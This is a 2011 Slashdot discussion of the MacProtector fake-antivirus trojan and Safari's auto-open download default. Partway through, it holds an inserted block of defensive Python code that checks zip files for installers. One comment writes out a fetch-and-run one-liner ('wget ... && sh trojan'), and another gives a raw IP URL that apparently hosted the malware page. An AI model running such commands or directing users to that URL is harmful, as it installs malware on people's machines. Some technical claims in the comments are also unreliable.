      It automatically popped up some kind of installer for MacProtector, which is apparently malware (based on my Googling). I'm pretty good on Windows and Linux, but I know next to nothing about the Mac. I'm not aware of any really low level geekery details like "Mac installers are always 100% safe! Just cancel out of them!" or anything like that. I'm confident it didn't have root access, but even with just my wife's login credentials, my suspicion is that it could have done a lot of damage.

      What *exactly* executed, and what was the result?

      She clicked on a Google search result. The Downloads dialog box popped up. It downloaded something almost too quickly for the eye to see. Some kind of malware installer then displayed a GUI. It looked like the very first step of the installer. There was a Continue button.

      I would be interested to know what malware got past, and what her settings in Safari were.

      I'm sure her Safari settings were almost entirely set to their defaults. The Mac is supposed to be the "safe" computer. Or so we thought...

      I'm sure the Slashdot crowd will come down hard on me over this. I fully expect my intelligence to be questioned and to be modded into oblivion. But really, I don't see how an average user should respond to this except to assume the worst and reinstall OS X.

      And I really do blame Apple for setting absolutely bone headed defaults on Safari.

    9. Re:Mac is vulnerable too by armanox · · Score: 1

      Not sure if this is what they ended up with, but see the blog post linked in this post that goes to it. Warning - Windows boxes are also very vulnerable to the same link.

      --
      I'm starting to think GNU is the problem with "GNU/Linux" these days.
    10. Re:Mac is vulnerable too by techtech · · Score: 4, Informative

      Safari / Mac OS X latest versions as of 08.05.2011 CET. As I happen to use the Google image search a lot, I open each image (from Google results) in a tab (collect them) and review them after that. Today I searched for different architecture-related things and managed to open this FAKE AV page a lot of times, on different pages. And the file that is downloaded is "anti-malware.zip" [1,9 MB on disk (1 872 571 bytes)]. This file contains "MacProtector.mpkg." I am sure I do not have the default settings, because I review every program's settings before I start using it, as a common procedure. I have the open secure files automatically option off; it was not opened. As far as I know Safari does not consider a zip a secure file, and there is not an automatic execution of mpkg inside a zip as standard?

    11. Re:Mac is vulnerable too by jo_ham · · Score: 2

      No, Safari won't execute an .mpkg as standard - that's an installer file and would require other user interaction (clicking next etc) to step through, and your admin password if it was going to go outside your home folder at all. So if you don't fall for the social engineering you can stop it at that point.

      It looks like it must be a trojan of some kind, but no different to any standard trojan: you have to have the user install it.

    12. Re:Mac is vulnerable too by jo_ham · · Score: 1

      It sounds like a trojan of some kind. By default (and Safari had the default options changed a few versions back - I can't remember if it was to be off by default or on, mine is set to "off"), and while it will treat a zip file as ok to decompress and a disk image similarly (it will mount them with that checkbox on), the .mpkg is an installer package, rather than the trojan itself and as you saw you need to step through it manually (and provide admin password if it goes outside home) to get it to install - a social engineering problem.

      Now, I definitely think it is a bad idea for Safari to decompress zip archives and mount disc images by default - with the setting for "safe" files off, while it might download it would not go beyond that.

      I do not agree with Apple that .zip should be considered a "safe" file.

    13. Re:Mac is vulnerable too by TangoMargarine · · Score: 1

      Isn't it disingenuous to criticize Apple for putting you into a situation that you have decided is unfalsifiably dangerous?

      --
      Unity? Screw that: XFCE. Slashdot Beta? Screw that: SoylentNews. Australis? Screw that: Pale Moon. UX developers DIAF
    14. Re:Mac is vulnerable too by TangoMargarine · · Score: 1

      I was a dope and fell for one of those "we have an invoice about a package that you ordered about to be delivered to your home" emails a month or two back. I downloaded the zip file, cracked it open, and ran the file before I noticed it was an exe, NOT a pdf as the icon suggested (this after me being one of those people who gets disgruntled about the system default in all the comp labs being to hide file extensions and telling multiple people about why this was a bad idea). After running a few different disinfectant programs on it, everything seemed to have cleared up and as far as I could tell my computer was back to normal.

      Cut to this morning, when I booted up to have the thing suddenly reassert itself from out of the blue and start "scanning for infections" again. At that point, I said "fuck it" and reinstalled Windows. I'm a CS major, but I don't want to spend the time to find a definite way to prove to myself that my system is clean that's better than asking the other CSSE people what they use, running said program(s), and taking it on faith that when they tell me "you're clean," I actually am.

      So to conclude my previous post, yes the situation sucks, but I don't see how it's particularly Apple's fault. As they like to say here on Slashdot, a lot of Macs' security isn't inherent, it's due to its smaller market size, and they've had articles about how they're being targeted more now, so hey...

      --
      Unity? Screw that: XFCE. Slashdot Beta? Screw that: SoylentNews. Australis? Screw that: Pale Moon. UX developers DIAF
    15. Re:Mac is vulnerable too by cathector · · Score: 4, Interesting

      i've been on osx for about two years, and just yesterday had my first malware experience,
      which is pretty much identical to Teckla's: i was in safari and followed a GIS link for "blanket octopus"
      and clicked on one of the pictures, and got a pop-up browser with some "security scan in progress.." BS dialog.
      no big deal.
      but then the OSX package installer opened up, trying to install some obvious malware .mpkg which had been downloaded to my desktop.
      downloading a file without my permission is already a total security fail, imo, but running the installer on it is beyond bad.
      obviously i nixed the installer and power-cycled and so far haven't noticed anything untoward, but it's scary.
      the name of the .mpkg was "MacProtector.mpkg". unfortunately i rm -rf'd without making an archive of it.
      - google shows a few hits for that. so, in short, yeah, Teckla's experience matches mine.

    16. Re:Mac is vulnerable too by cathector · · Score: 1

      i had a very similar experience yesterday. was GISing in safari for "blanket octopus" and suddenly the osx installer was running. the offending file was also MacProtector.mpkg, which had been downloaded to the desktop.

    17. Re:Mac is vulnerable too by techtech · · Score: 1

      So there is not anything sensational about this. The zip unzips on an "unsecured" computer (opens "safe" files), but you have to run a mpkg manually that resides in your download folder; little chance that this happens, if the user is not aware of what a mpkg is anyway. Safari gives you few indications other than the download manager that a file is downloaded.

    18. Re:Mac is vulnerable too by hedwards · · Score: 1

      So, they disabled the preference, but didn't remove it completely? I'm sorry, but that's just not responsible. There are some things which the user should have to do without help. If he wants to open the file, fine, but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the user's approval.

    19. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      downloading and mounting a DMG will appear to a naive user as if the program has installed something.

      so oh mac apologist, why is downloading and auto-mounting a DMG allowed?

      Why is downloading [and ANYTHING] allowed? It should download, period, nothing else, no exceptions, no _fucking_ exceptions.

      I _want_ to be able to be FASCIST about what the internet does.

    20. Re:Mac is vulnerable too by Teckla · · Score: 2

      Isn't it disingenuous to criticize Apple for putting you into a situation that you have decided is unfalsifiably dangerous?

      I did Google before I panicked too much. There is, so far, not a whole lot of confident sounding information on MacDefender / MacProtector.

      If it was splattered all over the Internet that it's safe to cancel out of the installer and go on your merry way, that's probably what I would have done.

      In any case, how can anyone seriously defend Apple for Safari defaults that automatically download something and run an installer?

      Seriously, you have got to be kidding me. Apple fucked up bad on this one, and should be called out for it. How can you not criticize Apple for this?

    21. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      MOD +5 TRUE DAT, TRUE

    22. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      Yay for Firefox 4.0.1 and NoScript. I didn't notice anything out of the ordinary, apart from an ugly page trying to set a handful of cookies I wouldn't accept.

    23. Re:Mac is vulnerable too by Billly+Gates · · Score: 1

      I am not a mac user. However, I know how buffer overflows work.

      All you need to do to run code on a platform with security or not is to simply trick a program to run to a specific ram address to execute the data. The kernel can't catch this; the program is already running.

      A way to do this is to download the executable code as data. Then somehow use an exploit in JavaScript or Safari to read a particular address and BAM!

      Images are stored as data but have the ability to execute code as well.

      The only time the OS does a check of its UID or an ACL (Windows) is when the program makes a request to the kernel via an api which in turn decides whether the program can run. If the exploit has its own code this function is never called and its simply bypassed.

    24. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      Unlike windows, mac provides program installation as an OS service. An mpkg is an installable file, not an installer. The malware was not running its own code, it was triggering the operating system's installer feature. Until you allow the OS to install the program nothing is going to happen to your mac. For sure it's arguably bad that safari automatically asks you to install a random program from the internet, but it's not running untrusted code - it's asking you whether you want to trust (and install) this code.

    25. Re:Mac is vulnerable too by perryizgr8 · · Score: 1

      yeah right, and guess what? ie and windows defaults also do not allow auto-installation of executables.

      --
      Wealth is the gift that keeps on giving.
    26. Re:Mac is vulnerable too by Billly+Gates · · Score: 1

      This is a new JavaScript exploit.

      More detail about it is here?

      It turns out this one targets those shopping for particular patterns and is unique in that it infects both Macs and PCs. Yes Apple fanbois your machines are not perfect and 100% invulnerable.

    27. Re:Mac is vulnerable too by perryizgr8 · · Score: 1

      i decided to be a little adventurous and opened the link on ie9/win7. brief glimpse of google image search and then a 404 error.

      --
      Wealth is the gift that keeps on giving.
    28. Re:Mac is vulnerable too by stiller · · Score: 0

      So basically you are blaming Apple for a default setting which resulted in a completely harmless situation which prompted you - without referencing anyone on the matter - to reinstall OS X?

      In other news: I just noticed a blinking light on my dashboard, so instead of calling my car dealership, I just assumed the worst and torched the car.

    29. Re:Mac is vulnerable too by houghi · · Score: 1

      Not a Mac issue, but a user issue. If I can convince people to do the following under Linux AND follow instructions, does that mean Linux is not safe?

      wget http://houghi.org/trojan && sh trojan

      Obviously I (or anybody else) could include different code.

      --
      Don't fight for your country, if your country does not fight for you.
    30. Re:Mac is vulnerable too by PhunkySchtuff · · Score: 1

      It did not download and execute, it downloaded and opened the installer. Your wife would have had to go clicking through an installer, and provide her admin credentials, in order to have installed/run something.

      Sorry, I'm not a Mac expert. All I know is that it automatically downloaded something, and automatically executed something.

      What it did was automatically download a zip file. The default option for safari is to open "safe" files after downloading, and this includes zip files. Yes, this option is bad in my opinion, but it's relatively safe. Safari will not open up a .pkg file automatically.

      After Safari downloaded and unzipped the zip file, you would then have ended up with a file in your ~/Downloads directory - the case I've seen is MacProtector.mpkg which is an installer package that has to be double-clicked on to launch and then this software needs an Administrator password to be entered. If you're not an admin user, you will need to enter the username and password of an administrative user to proceed, if you are running as an admin user, you just need to enter your password. If you are running as an admin user, I'd suggest you stop this straight away, this more than anything else will help keep your computer secure.

      This software comes from somewhere in Russia (there are ru.lproj files in the package and no en.lproj as you normally see). Once you have the software on your machine, it can be quite difficult for a non-technical user to clean up, but it's not incredibly difficult (kill the processes and trash the app)

      Just to recap though - Safari did download a file to your wife's computer. Safari did automatically unzip the file (or extract it from a dmg disk image if that's how it was distributed). From this point onwards though, it's the user's fault the software was installed. They would need to double-click on the downloaded installer and then enter an administrator's password to continue to install the malware.

      To be fair, the web page I saw this on pops up a new browser window that has either a Windows or Mac (depending on your platform) specific layout - the Windows one looks similar to My Computer and the Mac one looks like a Finder window. This window then runs a "quick scan" that tells you your computer is infected and the downloaded file will, of course, remove this infection.

      At the end of the day, a user's blind insistence to open an unknown installer and install this software with their administrator password burned you good and hard. It'll take minutes to force-quit the process and delete the offending app (although, had this been installed on my machine, I'd nuke from orbit too, just to be sure)

      When you're rebuilding your wife's Mac, make an admin user when you first boot the machine. Then make a regular user account that your wife uses for her every-day usage. Finally, go into Safari > Preferences > General and untick Open "safe" files after downloading

    31. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      From this point onwards though, it's the user's fault the software was installed. They would need to double-click on the downloaded installer and then enter an administrator's password to continue to install the malware.

      This is wrong. The installer is opened automatically.

      Of course it won't proceed without user confirmation. So no real harm done.

    32. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 2

      and automatically executed something. I'm not technically knowledgeable enough about OS X to know that, even though we immediately exited the malware installer, that nothing bad could possibly have happened.

      It executed the system's installer application. Nothing bad could possibly have happened up until that point. You will have to at least click a button to have anything installed. In many situations you will additionally be required to input your system administrator's name and password.

      And I'm still not convinced the malware installer didn't do something bad before it popped up its first GUI window.

      If you didn't acknowledge the installation, no foreign code will have been executed.

      I have no choice but to nuke the site from orbit (reinstall OS X).

      That's totally unnecessary.

      At the end of the day, Apple/Safari's amazingly fucked up defaults burned us good and hard.

      It didn't. It was you who decided not to trust the system.

    33. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      Yes Apple fanbois your machines are not perfect and 100% invulnerable.

      Um. What are you talking about? I will still have to actively acknowledge the installation of said malware.

      Of course, if you include the situations where the user willingly installs the malware himself, there can be no system that is open (as in you may install what you want) and secure at the same time.

      Note that I don't think my machine is perfect and/or invulnerable. There will never be a perfect system in this world. And Apple has to patch security problems all the time. Still, this malware is no real threat. It's just another form of social engineering.

    34. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the user's approval.

      I disagree. It's a very convenient setting and I have never seen a situation where anything bad happened.

      Just now I had that nice malware discussed here open the installer. Cute. I closed it and trashed the installer package.

      (It seems to be from Russia and will try to execute the malware after installation. Didn't investigate further.)

    35. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      No, Safari won't execute an .mpkg as standard

      It will. Actually, it just did for me. It unpacked the zip file and automatically started the installer by opening the mpkg.

      Still no problem unless you decide to continue with the installation.

    36. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      but you have to run a mpkg manually

      No. The system will do that for you. I just tried.

    37. Re:Mac is vulnerable too by Andreas+Mayer · · Score: 1

      obviously i nixed the installer

      Good.

      and power-cycled

      Why would you do that?

    38. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      tell your wife to stop browsing sketchy porn sites; the only time someone tried to send my mac malware was on a hardcore bsdm site, haha.

    39. Re:Mac is vulnerable too by Teckla · · Score: 1

      So basically you are blaming Apple for a default setting which resulted in a completely harmless situation which prompted you - without referencing anyone on the matter - to reinstall OS X?

      It's harmless for Safari to automatically download and execute installers? That's not supposed to concern users that aren't overly geekly familiar with OS X?

      In other news: I just noticed a blinking light on my dashboard, so instead of calling my car dealership, I just assumed the worst and torched the car.

      I Googled the problem first and there was so little information about it that it was unsafe to draw any solid conclusions.

    40. Re:Mac is vulnerable too by Teckla · · Score: 1

      Not a Mac issue, but a user issue.

      I think you're expecting users to be far too familiar with the technical details of OS X installers.

      On other operating systems, installers are not harmless little fuzzy creatures. If an installer is running, scary foreign code has already run. Sure, it might not have the security to install a keylogger, but at the very least, the contents of your $HOME directory have potentially already been compromised.

      This is part of the reason Slashdot sucks. If we were talking about cars instead, Slashdot would expect everyone to be a master mechanic, otherwise the Slashdot crowd would consider the person a "haha idiot n00b!".

      A lot of people use their computer as a tool to achieve some other goal. They don't use a computer just for the sake of using a computer. Expecting them to know that OS X installers are harmless little fuzzy creatures where nothing bad can possibly happen if you just exit the installer is asking a bit much.

    41. Re:Mac is vulnerable too by Teckla · · Score: 1

      After Safari downloaded and unzipped the zip file, you would then have ended up with a file in your ~/Downloads directory - the case I've seen is MacProtector.mpkg which is an installer package that has to be double-clicked on to launch and then this software needs an Administrator password to be entered.

      Let me be very clear on one point. Safari automatically ran the installer after the download completed. I was skeptical that my wife was accurate when she said that to me, so I tested it myself. Her story was the truth. Automatic download and execution of installer. It never asked for an administrator password (probably because we didn't step through the installer?).

      The message I seem to be getting in this thread (besides "it's all your fault, stupid") is that OS X installers are completely and utterly 100% no-questions-asked cute little furry safe friendly creatures that can only possibly do harm if you step through them.

      Since that is not the case with installers on any other OS I've used -- and as a long-time software developer, I've probably used dozens -- I assumed that, at the very least, the contents of her $HOME directory were compromised.

      In any case, I think Safari has some stunningly bad defaults, and I'm disappointed Apple would choose such defaults.

    42. Re:Mac is vulnerable too by jafiwam · · Score: 1

      Which of course means it's one step away from being a full exploit, so it's OK?

      System Installer is perfect software? It's version 1.0 and has never been updated because it was perfect the first time out?

      I know thinking about security is a bit new for a lot of Mac users, so here's how it works:

      Security is like an onion. It occurs in layers. It's absolutely true that you don't have to get all bent out of shape over one layer being compromised. Chances are, the others will take care of things. However, the attitude that that one compromised layer won't cause a problem and doesn't need to be fixed is a bad one. Because, you can always assume that each layer is flawed even if it has always worked perfectly in the past. Using a number of flawed layers that have flaws that don't add up to a hole is almost as good as perfect security. In fact, that's the best we can get. Because there is no "Perfect" involved. Ever.

      Too bad perfect security doesn't exist. And, usable security that still lets you get work done is even farther from perfect.

      In this case, letting a file get to the computer hard drive user space (not in some temp folder or memory) somewhere is a huge hole in a layer of the onion.

      Training users about using an annoying log in to install (which means 'do this without thinking' the very DEFINITION of training) software is another hole. One we probably can't fix because it's human nature.

      NOW, you are saying another layer isn't a big deal. Guess what, there aren't that many layers. Google's treatment of these shit sites is one layer, JavaScript and Browser security are other layers, the user interface is yet another one, and the user's brain is in there somewhere too.

      You aren't doing good security if you ignore layers. Sometimes you make compromises, but know that in each layer there are flaws, and sometimes the simplest stuff stops the bad guys cold because all the other layers were gotten through. (I saw a server once that was saved on reboot from total rooting because the user was a Turk, and couldn't spell the directory path in English. Had he used a system variable %systemfolder% he would have been in. He got through everything else.)

      So. Yes, Google should fix some of this stuff. However it's not their battle to fight. The folks over in Apple / Safari / JavaScript failed on this one big time.

      In my opinion, Google needs to be spending a lot more time letting users control what they search and where they go. I really don't fucking care to visit a web server hosted in former Soviet bloc countries EVER. I know Google has this information, why not use it? Added bonus, they can stay ahead of the search game by noting what users do. Here's a hint; if all the guys that search for instructions for stuff on the internet (which by definition is not Lusers) block a site, Google should too.

    43. Re:Mac is vulnerable too by Teckla · · Score: 2

      It didn't. It was you who decided not to trust the system.

      The fact that Safari will automatically download and execute installers may be technically safe -- just an annoyance, at worst -- but expecting users of OS X to know that OS X installers are 100% safe little furry friendly creatures that cannot possibly do any harm whatsoever to your computer is asking a bit much since installers work different on, well, every other OS in existence, in my (very broad) experience.

      On other operating systems, installers are foreign code that can do all sorts of harm to the contents of your $HOME directory at the very least.

    44. Re:Mac is vulnerable too by makomk · · Score: 1

      On other operating systems, installers are not harmless little fuzzy creatures.

      I don't think they always have been on Macs either. For example, at one point they could run code as root without prompting for the user's password (if you were logged into an admin account, which most Mac users are because that's what's created by default at install time).

    45. Re:Mac is vulnerable too by Teckla · · Score: 1

      I disagree. It's a very convenient setting

      We finally agree!

      It's a very convenient setting... for malware authors.

    46. Re:Mac is vulnerable too by Teckla · · Score: 1

      Unlike windows, mac provides program installation as an OS service. An mpkg is an installable file, not an installer. The malware was not running its own code, it was triggering the operating system's installer feature. Until you allow the OS to install the program nothing is going to happen to your mac. For sure it's arguably bad that safari automatically asks you to install a random program from the internet, but it's not running untrusted code - it's asking you whether you want to trust (and install) this code.

      That's an excellent description of the details of OS X .mpkg files. Thank you.

    47. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      Wow, overstated much?

    48. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      ...it downloaded a zip file. Is there any browser that won't do that?

    49. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      I think what it boils down to, is no matter how secure you make a system, if the system's users don't know how to respond, you will eventually have problems.

      My impression is that casual Mac users are just as concerned as casual Windows users--which means not at all. Therein lies your problem, and I would expect that Mac users are even at a disadvantage since few people have been harping at them to not simply agree to everything presented to the user, because Macs are more "secure" and don't have malware or viruses.

      Linux wins out in part because its users tend to be more advanced than either Mac or Windows users. They can smell a rat better when the system behaves differently or prompts for something unusual.

      Teckla, you shouldn't blame Apple entirely for this. Believing that nothing bad could happen is partially to blame. Some level of paranoia is good when it's a fact that there are cross platform applications out there that very well have the ability to identify what OS it's connected and then drop or pull the proper payload accordingly, once the victim clicks OK.

    50. Re:Mac is vulnerable too by armanox · · Score: 1

      I'm not going to say that's a bad thing if the link is dead now. Since I'm on a Windows box atm, I'm not going to check (don't like taking chances).

      --
      I'm starting to think GNU is the problem with "GNU/Linux" these days.
    51. Re:Mac is vulnerable too by Low+Ranked+Craig · · Score: 2

      I worked at getting this to happen this morning, and I finally did. What happens is that you search for an image, click on it, it redirects you to a site like this http://69.50.202.201/f1f7925050f1f83d3b0fc524a72f5af09f55c52837b293fb Which displays a bogus virus scanning screen and downloads a zip file. In safari if you have open safe attachments checked it will unzip the file, anti-malware.zip in this case and run the installer. This is true. However, this is a social engineering application. You still have to click continue and provide your password to install anything. As far as it goes it is very well done, but it is not a drive by install - you MUST EXPLICITLY GIVE PERMISSION to install it. I'm sure a bunch of people will install it, but there's nothing you can do about that. I felt comfortable enough to search this out and try it myself with no ill effects. Turn off open safe attachments in Safari if it bothers you.

      --
      I still cannot find the droids I am looking for...
    52. Re:Mac is vulnerable too by Low+Ranked+Craig · · Score: 1

      Because the user gave permission by clicking the checkbox in preferences?

      --
      I still cannot find the droids I am looking for...
    53. Re:Mac is vulnerable too by cathector · · Score: 1

      thanks for doing that research.
      yes, it's clear that you need to click "okay, install stuff" to have anything actually bad happen,
      but because users are ignorant, clumsy, inattentive, etc, even getting to that point is a huge security flaw.
      social engineering is a real danger, and the browser/OS need to do everything they can to help the user survive against it.

      > I'm sure a bunch of people will install it, but there's nothing you can do about that.
      that just seems like not facing the problem.
      consider your grandmother who does her banking online.
      how can you describe to her what's safe to install and what isn't ?

      the legitimate OSX installer should never open up for something the user hasn't intended.

    54. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      The social engineering gimmicks and turning off security defaults have been getting Windows users for years. Just like Nigerian scammers these guys know how to prey on unsuspecting people's emotions, etc. The more Macs there are, the more we'll see things like this. I actually think MacDefender is a crude attempt, since Apple fanbois think Macs are invulnerable, many won't click it. Just wait until the "steve_jobs_naked_picture" Mac virus does its rounds. Then, we'll see some real Mac fanboi action.

    55. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      No, Safari won't execute an .mpkg as standard -

      I hear almost an indignant nonbelief from the Mac fanbois on here. There is *NO WAY* Macs could open a .mpkg or whatever...

      @Mac Fanbois
      Are you sure? Is Apple's code perfect? We have half a dozen people claiming it happened on their Macs.

      @Mac Virus Victims
      Post the damn link so we can see for ourselves...

    56. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      Why the hell are any downloaded files considered "safe" to open, especially by default? That's like assuming the water flowing in a river through a very populated part of the world is automatically going to be "safe" to drink.

    57. Re:Mac is vulnerable too by Billly+Gates · · Score: 1

      No you don't.

      Look up buffer overflows. You can bypass the OS 100% and it won't even know it got infected nor check for security.

    58. Re:Mac is vulnerable too by toddestan · · Score: 1

      It's pretty obvious that the malware exploited some holes in OS X to get that far. Is there any reason to believe that the installer will suddenly play nice and not exploit more holes to infect the system without having to click on it and provide a password? Pwn2Own pretty much proves that OS X is full of security holes, so the only way to be completely sure is to nuke it and start over.

    59. Re:Mac is vulnerable too by jimicus · · Score: 1

      I tried this myself. It downloads a zip which contains a .mpkg, which OS X automatically executes.

      It's linked to from here if you want to try it yourself:

      http://cobbaut.blogspot.com/

      The installation process itself is not automated, you'd still need to click through and enter your admin password, but I didn't let it get that far.

    60. Re:Mac is vulnerable too by jimicus · · Score: 1

      Unless Safari picked up the configuration from when I migrated from a machine running Tiger, Snow Leopard does exactly the same thing.

    61. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      and provided her admin credentials, in order to have installed/run something

      Users on OS X can install apps in their own account (even in their own "Applications/" folder) without needing admin rights.

      Is this malware only executing with admin rights?

    62. Re:Mac is vulnerable too by PhunkySchtuff · · Score: 1

      OK, I've just tested this (with another installer, not the malware) and you are right.

      Safari downloads the file, unzips it and launches the Installer app.

      I completely agree with you that this is an absolutely crazy default setting and it should be changed.

      I'm adding the following script line to the first login script that I add to every SOE that I create:

      defaults write com.apple.Safari AutoOpenSafeDownloads -boolean No

      I will also be putting this setting in Workgroup Manager just to be 100% sure.

      The installer will ask for an administrator password, but you do need to step through it. It will also warn you if the installer has a preflight or installer check script as well that is executed before the installation is performed, although just about everyone (myself included) would click OK to this.
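An added example, not part of the thread or any poster's code: a way to triage a downloaded zip before anything is allowed to unpack and open it, covering the case discussed above where the archive carries an `.mpkg` installer. Because an `.mpkg` is a directory bundle, it appears inside a zip as a path prefix rather than as a single file, so the check walks every path component; the archive layout below is constructed, and only the names `MacProtector.mpkg` and `ru.lproj` come from the comments.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Package types that macOS hands to Installer.app.
INSTALLER_EXTS = (".pkg", ".mpkg")

# Constructed sample layout (assumption); only MacProtector.mpkg and ru.lproj
# are names taken from the thread.
SAMPLE_MEMBERS = [
    "MacProtector.mpkg/Contents/Info.plist",
    "MacProtector.mpkg/Contents/Packages/payload.pkg",
    "MacProtector.mpkg/Contents/Resources/ru.lproj/Welcome.rtf",
    "__MACOSX/._MacProtector.mpkg",
    "readme.txt",
]


def build_zip(members):
    """Build an in-memory zip with placeholder contents for the given names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in members:
            zf.writestr(name, b"constructed")
    return buf.getvalue()


def outermost_installer(member_name):
    """Return the shortest path prefix ending in .pkg/.mpkg, or None."""
    parts = PurePosixPath(member_name).parts
    for i, part in enumerate(parts):
        if part.lower().endswith(INSTALLER_EXTS):
            return "/".join(parts[: i + 1])
    return None


def triage_zip(data):
    """Inspect a zip's member list without extracting anything.

    Returns {"installers": {bundle: {"locales": [...], "has_en": bool}},
             "error": str or None}.
    """
    report = {"installers": {}, "error": None}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        report["error"] = str(exc)
        return report

    found = {}
    with zf:
        for name in zf.namelist():
            # Skip the resource-fork shadow entries Archive Utility adds.
            if name.startswith("__MACOSX/"):
                continue
            bundle = outermost_installer(name)
            if bundle is None:
                continue
            locales = found.setdefault(bundle, set())
            for part in PurePosixPath(name).parts:
                if part.lower().endswith(".lproj"):
                    locales.add(part[: -len(".lproj")])

    for bundle, locales in found.items():
        report["installers"][bundle] = {
            "locales": sorted(locales),
            # Older bundles use English.lproj instead of en.lproj.
            "has_en": bool(locales & {"en", "English"}),
        }
    return report


def verdict(report):
    """Hold back anything unreadable or carrying an installer package."""
    if report["error"] is not None or report["installers"]:
        return "quarantine"
    return "ok"


if __name__ == "__main__":
    result = triage_zip(build_zip(SAMPLE_MEMBERS))
    print(verdict(result), result["installers"])
```
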

    63. Re:Mac is vulnerable too by Low+Ranked+Craig · · Score: 1

      I don't really have an answer. I do prefer the way Macs do things with permission and installing things over Windows. Microsoft's solution is to basically lock everything down and makes you answer yes every time you want to do something. OS X asks you for your password to do dangerous things. I'm not defending Safari here - it really needs to be locked down, but everyone should simply uncheck the "open safe files after download". I believe that in more recent versions it is defaulted to off, but I can't verify that. Personally I use chrome anyway because I just like it better for many subtle reasons. I understand that most of the people in userland are generally clueless when it comes to computers and that this is what criminals prey upon, but I guess I have a hard time feeling sympathy. I mean here it is 2011, I've had countless windows machines, linux boxes and macs hooked up to the internet and I've never contracted a virus or malware. I don't run virus software, but I do have a sophisticated firewall. How many times do people need to be told not to install something if they don't know what it is? I'm sorry but if someone visits a website and ends up with an installer and they click "yes - install" and provide their password, they kinda sorta deserve what they get regardless of the OS.

      --
      I still cannot find the droids I am looking for...
    64. Re:Mac is vulnerable too by gmhowell · · Score: 1

      So, they disabled the preference, but didn't remove it completely? I'm sorry, but that's just not responsible. There are some things which the user should have to do without help. If he wants to open the file, fine, but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the user's approval.

      Wait, so this week's problem with Macs is that they offer too much control?

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
    65. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      No, your WIFE burned you good and hard by happily clicking through a random installer that popped up.

      Firefox and Chrome are not immune to bad user behaviour either. Sorry....

  11. You have to run them by Snaller · · Score: 1

    "By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. "

    I tried the noscript crap for a moment, every single page has tons of javascript, most of them don't work if it's disabled. It's possible you just browse to your homepage made in notepad, but for the rest of the world YOU MUST HAVE JAVASCRIPT ON.

    --
    If Google really cared they would fix Android Chrome to reflow text, instead of discriminating
    1. Re:You have to run them by Abstrackt · · Score: 2

      Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

      --
      They say a little knowledge is a dangerous thing, but it's not one half so bad as a lot of ignorance. - Terry Pratchett
    2. Re:You have to run them by 0123456 · · Score: 2

      Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

      Great idea. Then I can blacklist www.thissiteissafehonest.com _AFTER_ it's used Javashit to download malware to my computer.

      Disabling Javashit by default is the only safe way to browse the web these days.

    3. Re:You have to run them by Anonymous Coward · · Score: 0

      "By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. "

      I tried the noscript crap for a moment, every single page has tons of javascript, most of them don't work if it's disabled. It's possible you just browse to your homepage made in notepad, but for the rest of the world YOU MUST HAVE JAVASCRIPT ON.

      Use NoScript in blacklist mode, I do, it makes the web a much nicer place. Of course, you need other protection too. Every time I encounter a new buggy, too slow or resource hungry, or plain malicious javascript (detected by other software and Firefox extensions), I block it in Noscript, after less than two months I've usually blocked enough to only get annoyed by the web once a month or so. After I got a working blacklist, I can disable some Firefox extensions that I used to detect bad javascript, and Firefox becomes less slow (I don't think Firefox nor Chrome is fast, with all the f-ing extensions and other crap you must run to make them usable). There are also ready-made blacklists to download from the web.

      Even if both blacklists and whitelists are disabled in NoScript, it catches a lot of malicious javascript code. (Not all the ones described in this article though, but that is what I use blacklists for.)

      Opera has a built-in script-blocker that by default works in blacklist mode, but with a more convenient and less obtrusive UI than NoScript and YesScript for Firefox. Unfortunately I have to use Firefox because of legal (guarantees & contracts) and support reasons for some web-sites (bank, stock broking, web-mail etc.) and as I don't like switching between browsers, I use Firefox as my default browser, but script-blocking and many other things (builtins in Opera, clunky, slow and buggy addons in Firefox) in Opera is so ridiculously much better than in Firefox. If you are not forced to use Firefox, I recommend trying Opera.

    4. Re:You have to run them by jimicus · · Score: 1

      That's default-permit. It doesn't work. If it did, we wouldn't have to update antivirus scanners every day and still find malware getting through.

    5. Re:You have to run them by WuphonsReach · · Score: 1

      Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

      Blacklists are useless in an environment like this, just like A/V scanners that depend on signatures won't stop infection. The problem with a blacklist is that it is reactive, you're always behind the curve, and you can't tell that a piece of code is bad until it has already executed and inserted malware into the system.

      The reason that whitelists are better is that they are paranoid by default. Nothing executes unless it is from a site on the whitelist. Which means that if some hacker infects obscure-site-a.com and tricks you into visiting, the scripts on that obscure site will not run.

